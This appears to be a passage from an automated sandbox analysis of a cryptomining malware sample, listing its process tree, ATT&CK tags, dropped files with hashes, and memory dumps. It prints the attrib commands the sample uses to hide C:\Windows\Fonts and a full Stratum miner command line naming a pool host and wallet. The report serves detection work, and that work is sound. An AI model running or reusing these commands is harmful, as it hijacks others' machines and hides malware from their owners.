
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4688

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4628

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3972

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3988

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3688

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3696

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3508

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3144

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4832

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3188

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2176

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4660

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1740

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1540

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2376

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3556

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1812

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3952

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
1⤵
- Executes dropped EXE
PID:1132

\??\c:\windows\Fonts\KvMonXP.exe
"KvMonXP.exe" -o stratum+tcp://l.f2pool.info:443 -u 47QrUBQ4ejMW5wrWXiKUyRcQCZszauGWg9c3SLkzFoBJi45M5yN6gVPjVxSUfjMq4u8vepEejdnxyRQcv4RuFGy25x67433 -p x -k --donate-level=1 --print-time=5 --nicehash
2⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3540

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tem.vbs
Filesize
275B

MD5
4840e58034b78f4d0fa798ac2ffd1d49

SHA1
6616183e04694bd6680889d897cc4fbc61af0dfc

SHA256
97060f6ba35b625b60435fa18f91b755f36d03d8c9140f3ddf24e25bc830f0d9

SHA512
fdaec74527bd31d52b489a9ad01826d87d58abfa9575c446a14362b3cd5efad57357ddf539ff98840bd9532e20eb0aef5e0fdf8f8319695ab6591337863d513c

Download Submit
C:\Windows\Fonts\KvMonXP.exe
Filesize
775KB

MD5
8a8045c0472e3e90257d51a236ff62dd

SHA1
2d9cfd9bfe69e7daf9a695df48467d20904157d6

SHA256
d92cfffbd3060aa141eab23a8792aa05a0494a6323f92d10d457a8f89eab62c2

SHA512
1d65f219dad3fa0762019565300430234e690c8b4b74a941dd82785c75fd70945b1db94684af7aa0238f5d76b4c6ff0195d4f94ad34818868f86f01c1cbe4068

Download Submit
C:\Windows\Fonts\lsass.exe
Filesize
1.4MB

MD5
ec0bc41f1e623de85d1be23c55cc5dd8

SHA1
d1912bc5d7180b89af68fc7996a943df90b4106a

SHA256
0b7585b424e77d63186607a4b1e81d65849ce62e3bd6efd52f2b822378549981

SHA512
ea7aaf463a9fc6d28d116516f7c1f36c814f50dcd35779ae8b897155ef6c17dec25b4a2a0a05a8a518e32f2632fda8821c080b8fe2e27ee7613dcff07c15ed8e

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
\??\c:\windows\Fonts\KvMonXP.exe
Filesize
775KB

MD5
8a8045c0472e3e90257d51a236ff62dd

SHA1
2d9cfd9bfe69e7daf9a695df48467d20904157d6

SHA256
d92cfffbd3060aa141eab23a8792aa05a0494a6323f92d10d457a8f89eab62c2

SHA512
1d65f219dad3fa0762019565300430234e690c8b4b74a941dd82785c75fd70945b1db94684af7aa0238f5d76b4c6ff0195d4f94ad34818868f86f01c1cbe4068

Download Submit
\??\c:\windows\Fonts\lsass.exe
Filesize
1.4MB

MD5
ec0bc41f1e623de85d1be23c55cc5dd8

SHA1
d1912bc5d7180b89af68fc7996a943df90b4106a

SHA256
0b7585b424e77d63186607a4b1e81d65849ce62e3bd6efd52f2b822378549981

SHA512
ea7aaf463a9fc6d28d116516f7c1f36c814f50dcd35779ae8b897155ef6c17dec25b4a2a0a05a8a518e32f2632fda8821c080b8fe2e27ee7613dcff07c15ed8e

Download Submit
\??\c:\windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
\??\c:\windows\hosts.bat
Filesize
4KB

MD5
9459b1d319aab5c7773a1b24e3a25346

SHA1
efbd37a1b9fe93aa8b0ae23dba0999fc5437447c

SHA256
c21313ed87306ff6d0db8c0ef18fd89607fb068dcd4a82dcbd580b772dfe0663

SHA512
609988a8eb4d64951f5ea60083faf6fb4ac3063f6bfce780cab832c59219433bcd231262c4d4bcf7dac8e3860b2189ae71607dd1377bf98b65f75d1dcbc359e3

Download Submit
\??\c:\windows\hosts1.bat
Filesize
4KB

MD5
a98a5e1a59b4b05a4769924dfa541c53

SHA1
f5e4fe1c2959ca656fe76547bc600aedace2e02e

SHA256
cc5ec7687541b94eb3d3ebf025b07006aec46763f01c4428c30232bea51f562c

SHA512
189cf76f85a2178e8e58a15bf8e7f7668dc07e77da04e068a3fbc59acad59136fec8bf7caccb247659a5d6d44738e829e1d439d7dedd18659bc9f08ddb5874f0

Download Submit
memory/396-173-0x0000000000000000-mapping.dmp

Download
memory/828-169-0x0000000000000000-mapping.dmp

Download
memory/872-205-0x0000000000000000-mapping.dmp

Download
memory/920-164-0x0000000000000000-mapping.dmp

Download
memory/1132-197-0x0000000000000000-mapping.dmp

Download
memory/1132-229-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1132-226-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1176-183-0x0000000000000000-mapping.dmp

Download
memory/1184-198-0x0000000000000000-mapping.dmp

Download
memory/1484-196-0x0000000000000000-mapping.dmp

Download
memory/1492-139-0x0000000000000000-mapping.dmp

Download
memory/1512-137-0x0000000000000000-mapping.dmp

Download
memory/1592-206-0x0000000000000000-mapping.dmp

Download
memory/1732-174-0x0000000000000000-mapping.dmp

Download
memory/1732-188-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1732-207-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1812-149-0x0000000000000000-mapping.dmp

Download
memory/1824-187-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1824-171-0x0000000000000000-mapping.dmp

Download
memory/1824-195-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1844-222-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1916-160-0x0000000000000000-mapping.dmp

Download
memory/1924-170-0x0000000000000000-mapping.dmp

Download
memory/1976-179-0x0000000000000000-mapping.dmp

Download
memory/1984-159-0x0000000000000000-mapping.dmp

Download
memory/2088-180-0x0000000000000000-mapping.dmp

Download
memory/2088-190-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2088-225-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2120-202-0x0000000000000000-mapping.dmp

Download
memory/2156-138-0x0000000000000000-mapping.dmp

Download
memory/2240-167-0x0000000000000000-mapping.dmp

Download
memory/2264-162-0x0000000000000000-mapping.dmp

Download
memory/2444-209-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2444-189-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2444-176-0x0000000000000000-mapping.dmp

Download
memory/2476-141-0x0000000000000000-mapping.dmp

Download
memory/2560-194-0x0000000000000000-mapping.dmp

Download
memory/2608-157-0x0000000000000000-mapping.dmp

Download
memory/2700-152-0x0000000000000000-mapping.dmp

Download
memory/2784-200-0x0000000000000000-mapping.dmp

Download
memory/2832-166-0x0000000000000000-mapping.dmp

Download
memory/3024-145-0x0000000000000000-mapping.dmp

Download
memory/3104-227-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/3116-155-0x0000000000000000-mapping.dmp

Download
memory/3160-182-0x0000000000000000-mapping.dmp

Download
memory/3388-151-0x0000000000000000-mapping.dmp

Download
memory/3476-150-0x0000000000000000-mapping.dmp

Download
memory/3604-201-0x0000000000000000-mapping.dmp

Download
memory/3636-148-0x0000000000000000-mapping.dmp

Download
memory/3684-219-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/3728-153-0x0000000000000000-mapping.dmp

Download
memory/3776-161-0x0000000000000000-mapping.dmp

Download
memory/3836-168-0x0000000000000000-mapping.dmp

Download
memory/3852-163-0x0000000000000000-mapping.dmp

Download
memory/4000-165-0x0000000000000000-mapping.dmp

Download
memory/4064-185-0x0000000000000000-mapping.dmp

Download
memory/4120-228-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/4120-210-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/4168-133-0x0000000000000000-mapping.dmp

Download
memory/4172-204-0x0000000000000000-mapping.dmp

Download
memory/4232-131-0x0000000000000000-mapping.dmp

Download
memory/4236-147-0x0000000000000000-mapping.dmp

Download
memory/4244-132-0x0000000000000000-mapping.dmp

Download
memory/4288-130-0x0000000000400000-0x0000000000656000-memory.dmp

Filesize
2.3MB

Download
memory/4504-134-0x0000000000000000-mapping.dmp

Download
memory/4512-144-0x0000000000000000-mapping.dmp

Download
memory/4524-193-0x0000000000000000-mapping.dmp

Download
memory/4524-136-0x0000000000000000-mapping.dmp

Download
memory/4640-203-0x0000000000000000-mapping.dmp

Download
memory/4656-146-0x0000000000000000-mapping.dmp

Download
memory/4680-140-0x0000000000000000-mapping.dmp

Download
memory/4764-143-0x0000000000000000-mapping.dmp

Download
memory/4796-158-0x0000000000000000-mapping.dmp

Download
memory/4816-172-0x0000000000000000-mapping.dmp

Download
memory/4828-154-0x0000000000000000-mapping.dmp

Download
memory/4852-199-0x0000000000000000-mapping.dmp

Download
memory/4860-135-0x0000000000000000-mapping.dmp

Download
memory/5020-178-0x0000000000000000-mapping.dmp

Download
memory/5028-156-0x0000000000000000-mapping.dmp

Download
memory/5064-142-0x0000000000000000-mapping.dmp

Download
memory/5092-220-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/5092-218-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download